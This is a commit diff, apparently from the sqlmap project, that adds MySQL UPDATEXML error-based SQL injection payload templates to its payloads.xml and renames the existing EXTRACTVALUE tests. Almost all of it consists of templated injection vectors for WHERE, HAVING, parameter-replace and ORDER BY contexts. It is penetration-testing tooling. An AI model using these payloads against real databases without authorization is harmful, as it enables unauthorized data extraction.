Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit ca83305

Browse files
stamparmstamparm
committed
added MySQL updatexml error-based payload
1 parent 2033a28 commit ca83305

1 file changed

Lines changed: 88 additions & 8 deletions

File tree

xml/payloads.xml

Lines changed: 88 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -1010,15 +1010,35 @@ Formats:
10101010
</test>
10111011

10121012
<test>
1013-
<title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause</title>
1013+
<title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
10141014
<stype>2</stype>
10151015
<level>2</level>
10161016
<risk>0</risk>
10171017
<clause>1</clause>
10181018
<where>1</where>
1019-
<vector>AND EXTRACTVALUE([RANDNUM], CONCAT('\', '[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
1019+
<vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
10201020
<request>
1021-
<payload>AND EXTRACTVALUE([RANDNUM], CONCAT('\', '[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
1021+
<payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
1022+
</request>
1023+
<response>
1024+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1025+
</response>
1026+
<details>
1027+
<dbms>MySQL</dbms>
1028+
<dbms_version>&gt;= 5.1</dbms_version>
1029+
</details>
1030+
</test>
1031+
1032+
<test>
1033+
<title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)</title>
1034+
<stype>2</stype>
1035+
<level>3</level>
1036+
<risk>0</risk>
1037+
<clause>1</clause>
1038+
<where>1</where>
1039+
<vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
1040+
<request>
1041+
<payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
10221042
</request>
10231043
<response>
10241044
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1208,15 +1228,35 @@ Formats:
12081228
</test>
12091229

12101230
<test>
1211-
<title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause</title>
1231+
<title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
12121232
<stype>2</stype>
12131233
<level>3</level>
12141234
<risk>2</risk>
12151235
<clause>1</clause>
12161236
<where>1</where>
1217-
<vector>OR EXTRACTVALUE([RANDNUM], CONCAT('\', '[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
1237+
<vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\', '[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
1238+
<request>
1239+
<payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\', '[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
1240+
</request>
1241+
<response>
1242+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1243+
</response>
1244+
<details>
1245+
<dbms>MySQL</dbms>
1246+
<dbms_version>&gt;= 5.1</dbms_version>
1247+
</details>
1248+
</test>
1249+
1250+
<test>
1251+
<title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)</title>
1252+
<stype>2</stype>
1253+
<level>4</level>
1254+
<risk>2</risk>
1255+
<clause>1</clause>
1256+
<where>1</where>
1257+
<vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
12181258
<request>
1219-
<payload>OR EXTRACTVALUE([RANDNUM], CONCAT('\', '[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
1259+
<payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
12201260
</request>
12211261
<response>
12221262
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1433,7 +1473,7 @@ Formats:
14331473
</test>
14341474

14351475
<test>
1436-
<title>MySQL &gt;= 5.1 - Parameter replace</title>
1476+
<title>MySQL &gt;= 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>
14371477
<stype>2</stype>
14381478
<level>3</level>
14391479
<risk>0</risk>
@@ -1452,6 +1492,26 @@ Formats:
14521492
</details>
14531493
</test>
14541494

1495+
<test>
1496+
<title>MySQL &gt;= 5.1 error-based - Parameter replace (UPDATEXML)</title>
1497+
<stype>2</stype>
1498+
<level>4</level>
1499+
<risk>0</risk>
1500+
<clause>1,2,3</clause>
1501+
<where>3</where>
1502+
<vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
1503+
<request>
1504+
<payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
1505+
</request>
1506+
<response>
1507+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1508+
</response>
1509+
<details>
1510+
<dbms>MySQL</dbms>
1511+
<dbms_version>&gt;= 5.1</dbms_version>
1512+
</details>
1513+
</test>
1514+
14551515
<test>
14561516
<title>PostgreSQL error-based - Parameter replace</title>
14571517
<stype>2</stype>
@@ -1554,7 +1614,7 @@ Formats:
15541614
</test>
15551615

15561616
<test>
1557-
<title>MySQL &gt;= 5.1 error-based - GROUP BY and ORDER BY clauses</title>
1617+
<title>MySQL &gt;= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)</title>
15581618
<stype>2</stype>
15591619
<level>3</level>
15601620
<risk>0</risk>
@@ -1573,6 +1633,26 @@ Formats:
15731633
</details>
15741634
</test>
15751635

1636+
<test>
1637+
<title>MySQL &gt;= 5.1 error-based - Parameter replace (UPDATEXML)</title>
1638+
<stype>2</stype>
1639+
<level>4</level>
1640+
<risk>0</risk>
1641+
<clause>2,3</clause>
1642+
<where>1</where>
1643+
<vector>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
1644+
<request>
1645+
<payload>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
1646+
</request>
1647+
<response>
1648+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1649+
</response>
1650+
<details>
1651+
<dbms>MySQL</dbms>
1652+
<dbms_version>&gt;= 5.1</dbms_version>
1653+
</details>
1654+
</test>
1655+
15761656
<test>
15771657
<title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
15781658
<stype>2</stype>

0 commit comments

Comments
 (0)